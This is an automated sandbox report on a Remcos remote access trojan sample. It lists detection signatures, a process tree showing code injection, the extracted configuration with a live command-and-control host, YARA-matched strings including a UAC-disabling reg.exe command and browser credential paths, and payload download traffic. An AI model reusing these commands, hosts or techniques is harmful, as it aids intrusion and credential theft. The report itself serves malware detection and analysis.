Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report g4E1F7Lc2O

Overview

General Information

Sample Name:g4E1F7Lc2O (renamed file extension from none to exe)
Analysis ID:488339
MD5:7274d6c1a7dc0a091e1a801165f879cd
SHA1:cc686677e1e22b71ef2b18559adb4c16aef11756
SHA256:3b5a4b0fe5b8f4fd9bf24f32712e69da23b412a5653e0042d23a1d2429c42379
Tags:32exeRemcosRATtrojan
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • g4E1F7Lc2O.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\g4E1F7Lc2O.exe' MD5: 7274D6C1A7DC0A091E1A801165F879CD)
    • logagent.exe (PID: 3228 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • logagent.exe (PID: 7016 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh' MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • logagent.exe (PID: 5588 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn' MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • logagent.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz' MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • wscript.exe (PID: 6492 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
    • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6108 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1496 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 2792 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Bkmhwql.exe (PID: 4972 cmdline: 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe' MD5: 7274D6C1A7DC0A091E1A801165F879CD)
    • DpiScaling.exe (PID: 5800 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
  • Bkmhwql.exe (PID: 6612 cmdline: 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe' MD5: 7274D6C1A7DC0A091E1A801165F879CD)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1", "Assigned name": "Octopus", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Octopus-GM39UT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\lqwhmkB.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5f87c:$str_b2: Executing file:
    • 0x607e8:$str_b3: GetDirectListeningPort
    • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x60268:$str_b7: \update.vbs
    • 0x5f8cc:$str_b9: Downloaded file:
    • 0x5f8b8:$str_b10: Downloading file:
    • 0x5f8a0:$str_b12: Failed to upload file:
    • 0x607b0:$str_b13: StartForward
    • 0x607d0:$str_b14: StopForward
    • 0x60210:$str_b15: fso.DeleteFile "
    • 0x601a4:$str_b16: On Error Resume Next
    • 0x60240:$str_b17: fso.DeleteFolder "
    • 0x5f890:$str_b18: Uploaded file:
    • 0x5f90c:$str_b19: Unable to delete:
    • 0x601d8:$str_b20: while fso.FileExists("
    • 0x5fd61:$str_c0: [Firefox StoredLogins not found]
    00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x5f87c:$str_b2: Executing file:
      • 0x607e8:$str_b3: GetDirectListeningPort
      • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x60268:$str_b7: \update.vbs
      • 0x5f8cc:$str_b9: Downloaded file:
      • 0x5f8b8:$str_b10: Downloading file:
      • 0x5f8a0:$str_b12: Failed to upload file:
      • 0x607b0:$str_b13: StartForward
      • 0x607d0:$str_b14: StopForward
      • 0x60210:$str_b15: fso.DeleteFile "
      • 0x601a4:$str_b16: On Error Resume Next
      • 0x60240:$str_b17: fso.DeleteFolder "
      • 0x5f890:$str_b18: Uploaded file:
      • 0x5f90c:$str_b19: Unable to delete:
      • 0x601d8:$str_b20: while fso.FileExists("
      • 0x5fd61:$str_c0: [Firefox StoredLogins not found]
      00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        29.2.DpiScaling.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          29.2.DpiScaling.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x5e67c:$str_b2: Executing file:
          • 0x5f5e8:$str_b3: GetDirectListeningPort
          • 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x5f068:$str_b7: \update.vbs
          • 0x5e6cc:$str_b9: Downloaded file:
          • 0x5e6b8:$str_b10: Downloading file:
          • 0x5e6a0:$str_b12: Failed to upload file:
          • 0x5f5b0:$str_b13: StartForward
          • 0x5f5d0:$str_b14: StopForward
          • 0x5f010:$str_b15: fso.DeleteFile "
          • 0x5efa4:$str_b16: On Error Resume Next
          • 0x5f040:$str_b17: fso.DeleteFolder "
          • 0x5e690:$str_b18: Uploaded file:
          • 0x5e70c:$str_b19: Unable to delete:
          • 0x5efd8:$str_b20: while fso.FileExists("
          • 0x5eb61:$str_c0: [Firefox StoredLogins not found]
          7.2.logagent.exe.10590000.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            7.2.logagent.exe.10590000.2.unpackREMCOS_RAT_variantsunknownunknown
            • 0x6022a:$str_a1: C:\Windows\System32\cmd.exe
            • 0x601a6:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x601a6:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5f7ae:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x5fe06:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x5f402:$str_b2: Executing file:
            • 0x6036e:$str_b3: GetDirectListeningPort
            • 0x5fbc6:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x5fdee:$str_b7: \update.vbs
            • 0x5f452:$str_b9: Downloaded file:
            • 0x5f43e:$str_b10: Downloading file:
            • 0x5f426:$str_b12: Failed to upload file:
            • 0x60336:$str_b13: StartForward
            • 0x60356:$str_b14: StopForward
            • 0x5fd96:$str_b15: fso.DeleteFile "
            • 0x5fd2a:$str_b16: On Error Resume Next
            • 0x5fdc6:$str_b17: fso.DeleteFolder "
            • 0x5f416:$str_b18: Uploaded file:
            • 0x5f492:$str_b19: Unable to delete:
            • 0x5fd5e:$str_b20: while fso.FileExists("
            • 0x5f8e7:$str_c0: [Firefox StoredLogins not found]
            29.2.DpiScaling.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 19 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Script Execution From Temp FolderShow sources
              Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\logagent.exe, ParentImage: C:\Windows\SysWOW64\logagent.exe, ParentProcessId: 3228, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , ProcessId: 6492
              Sigma detected: WScript or CScript DropperShow sources
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\logagent.exe, ParentImage: C:\Windows\SysWOW64\logagent.exe, ParentProcessId: 3228, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , ProcessId: 6492

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 29.2.DpiScaling.exe.10591986.1.raw.unpackMalware Configuration Extractor: Remcos {"Version": "3.2.1 Pro", "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1", "Assigned name": "Octopus", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Octopus-GM39UT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: g4E1F7Lc2O.exeReversingLabs: Detection: 20%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5800, type: MEMORYSTR
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeReversingLabs: Detection: 20%
              Machine Learning detection for sampleShow sources
              Source: g4E1F7Lc2O.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeJoe Sandbox ML: detected
              Source: 7.0.logagent.exe.10590000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.2.DpiScaling.exe.10590000.2.unpackAvira: Label: TR/Dropper.Gen
              Source: 7.0.logagent.exe.10590000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DpiScaling.exe.10590000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DpiScaling.exe.10590000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DpiScaling.exe.10590000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 7.0.logagent.exe.10590000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 29.0.DpiScaling.exe.10590000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 7.2.logagent.exe.10590000.2.unpackAvira: Label: TR/Dropper.Gen
              Source: 7.0.logagent.exe.10590000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_0042E5CA
              Source: logagent.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: g4E1F7Lc2O.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 40.79.207.82:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.79.207.82:443 -> 192.168.2.4:49817 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.79.207.80:443 -> 192.168.2.4:49822 version: TLS 1.2
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004061C3 FindFirstFileW,FindNextFileW,7_2_004061C3
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040A22D
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_004153F5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,7_2_00417754
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_004077EC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407C87
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,7_2_0040697D

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: trapboijiggy.dvrlists.com
              Source: global trafficTCP traffic: 192.168.2.4:49757 -> 31.3.152.100:54614
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: logagent.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: logagent.exeString found in binary or memory: http://www.ebuddy.com
              Source: logagent.exeString found in binary or memory: http://www.imvu.com
              Source: logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
              Source: logagent.exe, logagent.exe, 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: logagent.exeString found in binary or memory: https://www.google.com
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00422251 recv,7_2_00422251
              Source: global trafficHTTP traffic detected: GET /y4mtCv4Bci6Hac_003x4VqzvkaJ-Z7nxrwXcb5jXVlYKlkhzWcxF7Vo37EbW_a-xuXuD_W5Kw2en7grAo9VbJ93WjIPSIXnkhhC01YboquwGm2AIlaKoBHi_6VZm402f9HRyjx263a6hGcO_detpGkOuS1Iilkybf-0BKA08CLK0ztz37lt8lonO0Gj45brJhwsjCvER4HfRxI_WR-8c3FzLA/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1User-Agent: zipoHost: qclcfg.sn.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4m8McKW7eldeu5q_fP_bF_m4iIq9osyPE57I7rb1_kM5QoBiqAdrxu2i4qYsOeelfS41khT2ygF2f_VC8v9Gn9G6LiEo3xeFj2gjsgQ3adajTXfShfNZuLPOgblEcRWeMAIqqfjDN3FOsy9v8A4xdiV5xQBr9C6Kp1gGFU_0W7UGH2I4sJxFO9E7heD-2idKZGLE2Y9wCDd3h9KtX1_VCCjQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1User-Agent: asweCache-Control: no-cacheHost: qclcfg.sn.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4m0xICa2FPeIWKBwiVht4HVgZjzq6LpzHUaJGDOXIHlp4vivbSfkbNqDw-sSDyEHvVJhVrvGVPd33MQ5HcP2SvyM6nlX6xDFoQditiEfVqQqMhE4Qc4N7yYrIrP_ac95EEJY4w_Tu44y8bkCBW_ZAx4xcJq_WAAcWyVvT0AZ3R3TAn9qo4vyG8ttwxtNnpVfUtIbduv9Mkg0VMIjOW8pgqVw/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1User-Agent: zipoHost: qclcfg.sn.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4m8yDreFSlMe8bH8Lwd6-50vUmg410-SwSSkigrGueMOAK6vuIcnI70W5Md0Twh3cJHnULU0HiRh-PYsljo5lnqZQ8qZOOWXyBsoFiToXjig3LjJKT1uAnM4DtrAl_czQgTOwCX9PrYAyhISl2Fn91pHYn5jrQb546YqDoVqX62x895dNsKCdnUm7beVR-2GTCGJe71pBq5IyId2FgNqaKnQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1User-Agent: zipoHost: qclcfg.sn.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4mRbmDsFAPLMwkG7lKvJMgSVtNsjr4ltCR3rwxB9MbuFMvkFbdugz3VkrPF6JHEOQjdf1gbwNsmeTew5aBzWEoZ_UUhrtF4cvO0Cy53-UiMu3gc94jsjRZTaQMKMstCGG5ctMtuiFqol2YibfgQivz5qCVOpMFSPRaO4_YtkHijee0swhbUFmx9nPDDBiDGkp_y0eWq5zQ7iQA5M2nHJs6eg/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1User-Agent: zipoHost: qclcfg.sn.files.1drv.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /y4mpyA5pU3Kf_pjC6vc3DaDBL1qukGX88FVbJzbG-4ODOzUHoYLgFl9XwynneBAFD7G6Sn-Q7msbMnTVXZhDosESPPaWiTuetnYJy5bnKucZ954o3aqcIhCV9qT4DWdA8du81hF2m7lylwbq8oIYpSThnJTSLo0ur1z4CSYglycD241at-IzNZwiJkPHuTR0mG9ZZdPjNei_I_3Uud_L3Bc3g/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1User-Agent: asweCache-Control: no-cacheHost: qclcfg.sn.files.1drv.comConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 40.79.207.82:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.79.207.82:443 -> 192.168.2.4:49817 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.79.207.80:443 -> 192.168.2.4:49822 version: TLS 1.2
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,19_2_0040BA30

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
